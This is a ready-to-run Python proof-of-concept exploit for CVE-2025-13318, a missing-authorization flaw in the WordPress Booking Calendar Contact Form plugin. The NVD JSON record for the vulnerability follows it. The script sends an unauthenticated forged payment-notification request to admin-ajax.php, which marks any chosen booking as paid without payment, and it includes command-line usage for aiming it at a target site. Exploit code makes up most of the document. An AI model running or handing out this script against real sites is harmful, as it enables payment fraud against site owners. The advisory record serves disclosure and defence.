CVE-2025-13318

#!/usr/bin/env python3 """ CVE-2025-13318 PoC - Booking Calendar Contact Form Missing Authorization This PoC demonstrates the authorization bypass vulnerability in the Booking Calendar Contact Form plugin for WordPress. """ import requests import sys def exploit_cve_2025_13318(target_url, booking_id): """ Exploit the missing authorization vulnerability. Args: target_url: Base URL of the WordPress site booking_id: The booking ID to confirm without payment Returns: bool: True if exploitation appears successful """ # Vulnerable endpoint endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Craft the malicious request # The 'dex_bccf_ipn' parameter triggers the vulnerable function # without any authorization or payment verification payload = { 'action': 'dex_bccf_ipn', 'dex_bccf_ipn': booking_id, 'payment_status': 'completed', 'txn_id': 'EXPLOIT_' + str(booking_id) } try: print(f"[*] Sending exploit request to: {endpoint}") print(f"[*] Targeting booking ID: {booking_id}") # Send the request (no authentication required) response = requests.post(endpoint, data=payload, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") # Check if the request was processed if response.status_code == 200: print("[+] Exploit sent successfully!") print("[+] Booking should now be confirmed without payment verification") return True else: print("[-] Exploit may have failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <booking_id>") print(f"Example: {sys.argv[0]} http://example.com 12345") sys.exit(1) target_url = sys.argv[1].rstrip('/') booking_id = sys.argv[2] print("=" * 60) print("CVE-2025-13318 - Booking Calendar Contact Form Exploit") print("=" * 60) exploit_cve_2025_13318(target_url, booking_id) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-13318", "sourceIdentifier": "[email protected]", "published": "2025-11-22T09:15:42.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Calendar Contact Form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.60. This is due to missing authorization checks and payment verification in the `dex_bccf_check_IPN_verification` function. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and bypass payment requirements via the 'dex_bccf_ipn' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/tags/1.2.59/dex_bccf.php#L1409", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/trunk/dex_bccf.php#L1409", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399906%40booking-calendar-contact-form&new=3399906%40booking-calendar-contact-form&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/83b0ae2c-6b08-4b71-a728-c60722ec20c7?source=cve", "source": "[email protected]"}]}}